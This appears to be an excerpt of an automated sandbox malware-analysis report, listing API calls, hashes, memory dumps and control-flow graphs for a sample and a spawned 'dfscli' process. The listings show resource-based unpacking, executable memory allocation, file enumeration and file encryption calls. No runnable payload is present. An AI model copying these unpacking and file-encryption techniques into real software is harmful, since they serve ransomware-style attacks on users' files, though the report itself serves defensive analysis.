                                                                  • Instruction Fuzzy Hash: 5611A371907124BA9B209FAA9C45CDFBF6CDE0A7B4B304567F014E21D0EB349E50D6A9
                                                                  APIs
                                                                  • GetClassInfoA.USER32(?,-0000007C,?), ref: 004214FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ClassInfo
                                                                  • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                  • API String ID: 3534257612-2801496823
                                                                  • Opcode ID: bd080865469e38637f7ee73eafe3d082cd40be6588647cb402949ac972de2cf5
                                                                  • Instruction ID: 4ba1055b97871b79f2e7e250bc91374e937afd52b24a3d5666128ff83e3a1e39
                                                                  • Opcode Fuzzy Hash: bd080865469e38637f7ee73eafe3d082cd40be6588647cb402949ac972de2cf5
                                                                  • Instruction Fuzzy Hash: 992130B1A00219AB8F10EF96E8419DE7BB8BE58354F50406BF908E3251E7389951CBA9
                                                                  APIs
                                                                  • ___initmbctable.LIBCMT ref: 004129D7
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ExeFile (233).exe,00000104,76230A60,00000000,?,?,?,?,0040E931,?,00431A70,00000060), ref: 004129EF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName___initmbctable
                                                                  • String ID: C:\Users\user\Desktop\ExeFile (233).exe
                                                                  • API String ID: 767393020-2966024786
                                                                  • Opcode ID: 101123d8790505b808453694c3784ed6a65f9cded7262870a66330ec90ee2c88
                                                                  • Instruction ID: fe4f9612b987f02c86c9f827e6e88cda74fa422bc8271a69fa383c6bdeb5fba6
                                                                  • Opcode Fuzzy Hash: 101123d8790505b808453694c3784ed6a65f9cded7262870a66330ec90ee2c88
                                                                  • Instruction Fuzzy Hash: 4A110D72E04104EBC720DBA9ED419DB77A8EB553A0F10017FF905E3290E6B49D45CB98
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 021F2468
                                                                  • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 021F24B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: @
                                                                  • API String ID: 544645111-2766056989
                                                                  • Opcode ID: 14c15e6223799ba746728dc70be7de4913c20ad4deae5ef25c380b9e6038f451
                                                                  • Instruction ID: 57c4d599bda53162a2468fe3e0f427e3745f3a61e68525280d5b97e6fc7040e3
                                                                  • Opcode Fuzzy Hash: 14c15e6223799ba746728dc70be7de4913c20ad4deae5ef25c380b9e6038f451
                                                                  • Instruction Fuzzy Hash: 5821E9B0E44209EFDF54CF94C980BADBBB5BF44304F108599DE25A7240C7B4AA80DF55
                                                                  APIs
                                                                    • Part of subcall function 00405C41: GetWindowExtEx.GDI32(?,?), ref: 00405C4D
                                                                    • Part of subcall function 00405C1D: GetViewportExtEx.GDI32(?,?), ref: 00405C29
                                                                  • MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                  • MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ViewportWindow
                                                                  • String ID: Fw@
                                                                  • API String ID: 1589084482-2650048193
                                                                  • Opcode ID: 8ba70028f401d5047d1f3a52ed28d91a46c6a7a7344e8140392911f288c2f3f7
                                                                  • Instruction ID: 608e97be970086dca0e1fa4dc7a0ff41e63cb8bbaa647bae0e741146e3f8859e
                                                                  • Opcode Fuzzy Hash: 8ba70028f401d5047d1f3a52ed28d91a46c6a7a7344e8140392911f288c2f3f7
                                                                  • Instruction Fuzzy Hash: 2AF06276900218BFDB207FA59C05C9FBBACDE44214B15043AF940B3152FA75AD108E54
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: (C$8C
                                                                  • API String ID: 3519838083-3442521767
                                                                  • Opcode ID: d0684f4a3a2aa2981b89f74af03356699898ca66f3f3816a80820ca2283281ea
                                                                  • Instruction ID: 7ee2ab24155dd1533db6df93568111abed88cbadf2414e72971fbd093de00081
                                                                  • Opcode Fuzzy Hash: d0684f4a3a2aa2981b89f74af03356699898ca66f3f3816a80820ca2283281ea
                                                                  • Instruction Fuzzy Hash: 1D017571F01170AFD738BB19A6447AEB2A0AF08710F46826FA05997690CBBC8C408A49
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                  • LocalFree.KERNEL32(?), ref: 00429C2E
                                                                  • TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                  • String ID:
                                                                  • API String ID: 2949335588-0
                                                                  • Opcode ID: de5eba0c02b59015a2dcef9b56467b2c93d0e5e81c9af4f62aac4812230e8b9f
                                                                  • Instruction ID: 4f4236dd2a41b9a2d9142ab37103e81bc3eebe3eca6605d7b1983f38d4fab71a
                                                                  • Opcode Fuzzy Hash: de5eba0c02b59015a2dcef9b56467b2c93d0e5e81c9af4f62aac4812230e8b9f
                                                                  • Instruction Fuzzy Hash: 2011AC34700610EFD720CF56E884B6AB7B4FF05315F90802EE1468B2A1CB75BC50CB18
                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00411300,00000000,?,00000000), ref: 00410D36
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00411300,00000000,?,00000000), ref: 00410D6F
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00410D8D
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 00410DA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  • Opcode ID: e608a2bb139fdee7726e9a56420f7327c038405a57471824ccf7c18d09e58544
                                                                  • Instruction ID: 5ba2f75a3631e755b4902d4e05e9c9231f22547c1912ff447ca3f9ea5e59f1b4
                                                                  • Opcode Fuzzy Hash: e608a2bb139fdee7726e9a56420f7327c038405a57471824ccf7c18d09e58544
                                                                  • Instruction Fuzzy Hash: 3E118FB4600200DFD7718F99FC45D627BB5FB82315760453AF296C62B0C770B8AACB18
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                  • LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429EAC: InitializeCriticalSection.KERNEL32(0043F21C,00429F23,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429EC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitialize$Leave
                                                                  • String ID:
                                                                  • API String ID: 713024617-0
                                                                  • Opcode ID: fbf9e35468238c369b4e9d309fef15a1138fbb31a7b7e0400c31e566406133dd
                                                                  • Instruction ID: 64048ed4fafcfd63e0d0b0e47ab2320bfea24fe3f3f20fa265999014551e40f8
                                                                  • Opcode Fuzzy Hash: fbf9e35468238c369b4e9d309fef15a1138fbb31a7b7e0400c31e566406133dd
                                                                  • Instruction Fuzzy Hash: 87F06D7690021ADFDB109F95FC84BA7B7ACFB14316F801437E60492021D739A86ACAAC

                                                                  Execution Graph

                                                                  Execution Coverage: 3%
                                                                  Dynamic/Decrypted Code Coverage: 51.8%
                                                                  Signature Coverage: 0.2%
                                                                  Total number of Nodes: 564
                                                                  Total number of Limit Nodes: 75

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(Advapi32.dll,EncryptFileA), ref: 00402563
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402566
                                                                  • EncryptFileA.ADVAPI32(C:\Windows\Setup\State\State.ini), ref: 00402571
                                                                  • LoadLibraryA.KERNEL32 ref: 004028F0
                                                                  • GetProcAddress.KERNEL32(00000000,LdrFindResource_U), ref: 004028FA
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040291E
                                                                  • LdrFindResource_U.NTDLL(00400000,?,00000003,?), ref: 00402940
                                                                  • LdrAccessResource.NTDLL(00400000,?,?,?), ref: 00402961
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00402974
                                                                    • Part of subcall function 00403B40: LoadIconA.USER32(?,00000080), ref: 00403C94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLoadProc$Library$AccessAllocEncryptFileFindIconResourceResource_Virtual
                                                                  • String ID: 2sqN7HPu$ul(RB@jWoBnNar^zWR24F02n#bnM3gX6zQ>^jmGICwkhJ?*#2^h2EEKd&#?A8<JT0c%Q?f1Y6Da*fKp6B+(L3!F<O*&V$Acces$Advapi32.dll$C:\Windows\Setup\State\State.ini$EncryptFileA$Ldr$LdrAccessR$LdrFin$LdrFindResource_U$dReso$esource$ntdll.dll$r_n$sResource$tdll$urce_U
                                                                  • API String ID: 2745701538-3822946923
                                                                  • Opcode ID: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction ID: 7606226607a74ee82f4d59785f456a1b28ac7059c3ee9b1f73d73fed3cc09996
                                                                  • Opcode Fuzzy Hash: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction Fuzzy Hash: 074208B19083C0DBD331DF1AC585BCBFBE4AB99704F44492FA1C953291DAB8A548CB5B

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(021C4054,021C4040), ref: 021C1047
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021C104E
                                                                    • Part of subcall function 021C1B30: SetLastError.KERNEL32(0000000D,?,021C1070,?,00000040), ref: 021C1B3D
                                                                  • SetLastError.KERNEL32(000000C1), ref: 021C1096
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117474523.00000000021C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021C1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_21c1000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1866314245-0
                                                                  • Opcode ID: 4e1785371ebb9f57421cbce8350b40e1edd31fb862d47bdf074662a375863cbc
                                                                  • Instruction ID: b59886c71aed4a2e72cd0ea571c40822bc6f3e393d8593127308e9e854b68d1d
                                                                  • Opcode Fuzzy Hash: 4e1785371ebb9f57421cbce8350b40e1edd31fb862d47bdf074662a375863cbc
                                                                  • Instruction Fuzzy Hash: BAF1FEB9E80209EFDB04CF94D584BAEB7B1BF58314F208598E919A7342D735EA51CF90

                                                                  Control-flow Graph

                                                                  control_flow_graph 368 22338f0-223390b 369 2233910-2233915 368->369 370 2233a74-2233a79 369->370 371 223391b 369->371 372 2233b62-2233b67 370->372 373 2233a7f-2233a84 370->373 374 2233921-2233926 371->374 375 2233a2c-2233a33 371->375 372->369 376 223393a-223393f 373->376 377 2233a8a-2233a8f 373->377 378 2233988-223399b call 22334c0 374->378 379 2233928-223392d 374->379 380 2233a50-2233a64 FindFirstFileW 375->380 381 2233a35-2233a4b call 2233f20 call 2233e80 375->381 376->369 389 2233941-223394b 376->389 385 2233a95-2233a9b 377->385 386 2233b3c-2233b5d 377->386 401 22339b8-22339d3 378->401 402 223399d-22339b3 call 2233f20 call 2233e80 378->402 387 223392f-2233934 379->387 388 223394c-2233953 379->388 383 2233b93-2233b9d 380->383 384 2233a6a-2233a6f 380->384 381->380 384->369 392 2233abf-2233ac1 385->392 393 2233a9d-2233aa5 385->393 386->369 387->376 394 2233b6c-2233b73 387->394 395 2233970-2233986 FindNextFileW 388->395 396 2233955-223396b call 2233f20 call 2233e80 388->396 404 2233ab5-2233aba 392->404 406 2233ac3-2233ad6 call 22334c0 392->406 403 2233aa7-2233aab 393->403 393->404 399 2233b90-2233b91 FindClose 394->399 400 2233b75-2233b8b call 2233f20 call 2233e80 394->400 395->369 396->395 399->383 400->399 423 22339f0-22339fb 401->423 424 22339d5-22339eb call 2233f20 call 2233e80 401->424 402->401 403->392 411 2233aad-2233ab3 403->411 404->369 419 2233af3-2233b23 call 22338f0 406->419 420 2233ad8-2233aee call 2233f20 call 2233e80 406->420 411->392 411->404 442 2233b28-2233b37 call 2233460 419->442 420->419 435 2233a18-2233a27 423->435 436 22339fd-2233a13 call 2233f20 call 2233e80 423->436 424->423 435->369 436->435 442->369
                                                                  APIs
                                                                  • FindNextFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233976
                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233A5D
                                                                  • FindClose.KERNELBASE(?,00000000,0223998D,16BF64F2,00000001), ref: 02233B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: .$8T]$8T]$Ei$Ei
                                                                  • API String ID: 3541575487-3972632629
                                                                  • Opcode ID: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
                                                                  • Instruction ID: e2110a1afe3a452984fedbae5295bfbe0882b947111b9b60d376f3440b7b6ca3
                                                                  • Opcode Fuzzy Hash: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
                                                                  • Instruction Fuzzy Hash: B851C4F5B3430197C726EAF4A84467B36E6AB80354F04099DE946C7248EF79CA1587D2

                                                                  Control-flow Graph

                                                                  control_flow_graph 604 2238240-223832a 605 2238332-2238338 604->605 606 2238431-2238437 605->606 607 223833e 605->607 608 22384c3-22384c8 606->608 609 223843d-2238443 606->609 610 2238344-223834a 607->610 611 22383fc-2238403 607->611 608->605 612 2238445-223844c 609->612 613 22384ac-22384b2 609->613 614 22383c0-22383c7 610->614 615 223834c-2238352 610->615 616 2238420-223842c 611->616 617 2238405-223841b call 2233f20 call 2233e80 611->617 620 2238469-223848c 612->620 621 223844e-2238464 call 2233f20 call 2233e80 612->621 613->605 622 22384b8-22384c2 613->622 618 22383e4-22383f7 614->618 619 22383c9-22383df call 2233f20 call 2233e80 614->619 623 2238358-223835e 615->623 624 22384cd-2238515 call 223b590 615->624 616->605 617->616 618->605 619->618 640 22384a9 620->640 641 223848e-22384a4 call 2233f20 call 2233e80 620->641 621->620 623->613 630 2238364-223836c 623->630 624->622 647 2238517 624->647 637 223836e-2238386 call 2233f20 call 2233e80 630->637 638 223838c-22383b0 CreateFileW 630->638 637->638 638->622 643 22383b6-22383bb 638->643 640->613 641->640 643->605 652 2238519-223851b 647->652 653 223851d-223852a 647->653 652->622 652->653
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022383A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: J$.#v
                                                                  • API String ID: 823142352-3621003161
                                                                  • Opcode ID: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
                                                                  • Instruction ID: 046fc3dc4dde37c9fd8800998cf9e95323985028582ccfc22bde7e6b40b044dc
                                                                  • Opcode Fuzzy Hash: dc04e8415f8b403b2db57900e774afde47804ba0af262eab940fd3d3e61ed8c2
                                                                  • Instruction Fuzzy Hash: CE61ADB2A283019BC709DFA8D484A2FB7E6ABC4754F04891DF495DB298D774C9098BD3

                                                                  Control-flow Graph

                                                                  control_flow_graph 277 2237ec0-2237f8c 278 2237f94-2237f99 277->278 279 2237fa0-2237fa6 278->279 280 22380cb-22380d1 279->280 281 2237fac 279->281 284 22380d7-22380dd 280->284 285 22381a8-22381b0 280->285 282 223801a-223802e call 22334c0 281->282 283 2237fae-2237fb4 281->283 312 2238030-2238048 call 2233f20 call 2233e80 282->312 313 223804e-2238076 282->313 286 2237fb6-2237fbc 283->286 287 2237fd5-2238018 call 223b590 283->287 288 2238173-223817a 284->288 289 22380e3-22380e9 284->289 291 22381b2-22381ca call 2233f20 call 2233e80 285->291 292 22381d0-22381f4 CreateFileW 285->292 297 2237fc2-2237fc8 286->297 298 2238200-2238207 286->298 287->279 295 2238197-22381a3 288->295 296 223817c-2238192 call 2233f20 call 2233e80 288->296 300 22380eb-2238122 289->300 301 223815a-2238160 289->301 291->292 293 2238227-2238233 292->293 294 22381f6-22381fb 292->294 294->279 295->279 296->295 297->301 308 2237fce-2237fd3 297->308 306 2238224-2238225 FindCloseChangeNotification 298->306 307 2238209-223821f call 2233f20 call 2233e80 298->307 310 2238124-223813a call 2233f20 call 2233e80 300->310 311 223813f-2238155 SetFileInformationByHandle 300->311 301->279 304 2238166-2238172 301->304 306->293 307->306 308->279 310->311 311->279 312->313 328 2238093-223809e 313->328 329 2238078-223808e call 2233f20 call 2233e80 313->329 340 22380a0-22380b6 call 2233f20 call 2233e80 328->340 341 22380bb-22380c6 328->341 329->328 340->341 341->278
                                                                  APIs
                                                                  • SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 02238149
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 022381ED
                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02238225
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2117594434.0000000002231000.00000020.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: true
                                                                  • Associated: 00000002.00000002.2117580571.0000000002230000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117609013.000000000223D000.00000004.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002240000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002245000.00000002.00001000.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.2117634381.0000000002252000.00000002.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_2230000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: File$ChangeCloseCreateFindHandleInformationNotification
                                                                  • String ID: J$e?M:$e?M:$.#v$Ei${
                                                                  • API String ID: 1885865419-1658071454
                                                                  • Opcode ID: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
                                                                  • Instruction ID: d57d0373b525ab6045a60ed935b2befa2aef531a9fc61ea6449958a1c718d36e
                                                                  • Opcode Fuzzy Hash: dc67a909832748e3640bac90cbd2579213ab096e5f993dec6094df8410dae01b
                                                                  • Instruction Fuzzy Hash: E381C2B1A183019FC719DFA4A49462BB6E6BBC4748F000D2DF556CB258EB74D9048FD3

                                                                  Control-flow Graph

                                                                  control_flow_graph 348 4297aa-4297c9 EnterCriticalSection 349 4297cb-4297d2 348->349 350 4297d8-4297dd 348->350 349->350 351 42988c-42988f 349->351 352 4297fa-429802 350->352 353 4297df-4297e2 350->353 354 429891-429894 351->354 355 429897-4298b5 LeaveCriticalSection 351->355 357 429814-429833 GlobalHandle GlobalUnlock GlobalReAlloc 352->357 358 429804-429812 GlobalAlloc 352->358 356 4297e5-4297e8 353->356 354->355 359 4297f2-4297f4 356->359 360 4297ea-4297f0 356->360 361 429839-42983b 357->361 358->361 359->351 359->352 360->356 360->359 362 429860-429889 GlobalLock call 40ee80 361->362 363 42983d-429842 361->363 362->351 365 429852-429855 LeaveCriticalSection 363->365 366 429844-42984c GlobalHandle GlobalLock 363->366 365->362 366->365
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,76230A60,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 004297BB
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 0042980C
                                                                  • GlobalHandle.KERNEL32(006125A0), ref: 00429815
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042981F
                                                                  • GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 00429833
                                                                  • GlobalHandle.KERNEL32(006125A0), ref: 00429845
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042984C
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429855
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429861
